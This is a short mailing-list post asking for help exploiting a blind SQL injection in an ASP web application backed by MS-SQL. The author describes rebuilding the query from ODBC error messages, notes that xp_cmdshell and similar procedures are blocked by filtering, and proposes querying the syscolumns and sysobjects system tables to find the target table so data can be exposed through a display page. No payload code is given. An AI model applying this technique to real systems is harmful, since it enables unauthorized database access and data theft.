sql insertion

[H D Moore <hdm () secureaustin com>]

I have a buggy web application which takes an input field and places it in 
the middle of an SQL query, then executes it against a MS-SQL server. I can 
rewrite the query because single quotes are used to encapsulate the input 
field, and the script doesn't strip out the single quote character. 

I pieced together most of the original SQL by viewing the ODBC error messages 
the IIS server spits out when I mangle the query:

SELECT ? FROM ? WHERE KnownColumnName = '%input%'

The backend SQL server is behind heavy incoming and outgoing packet filters, 
so just using xp_cmdshell, xp_sendmail, or sp_makewebtask  wont cut it.  
There is however an interface on the web site which displays certain fields 
from the same table which the above query select's from.  If take the output 
of one query and insert it into the field of this table, I could 
theoretically view the results by browsing this web interface.  The problem 
is that I don't know the name of the table that my query is working on, so I 
cant run an update or insert query until I figure that out.  I went through a 
massive amount of common table names without much luck, so does anyone know 
of a method to determine the name of the table?  Keep in mind that I can't 
actually view the results of any query, because the ASP script is treating 
the return value as a boolean.  Is there a way to select the object ID of 
known column name from the syscolumns metatable, pass that object ID into 
another subselect against the sysobjects metatable to get the table name, and 
finally use that table as part of a final query?

-HD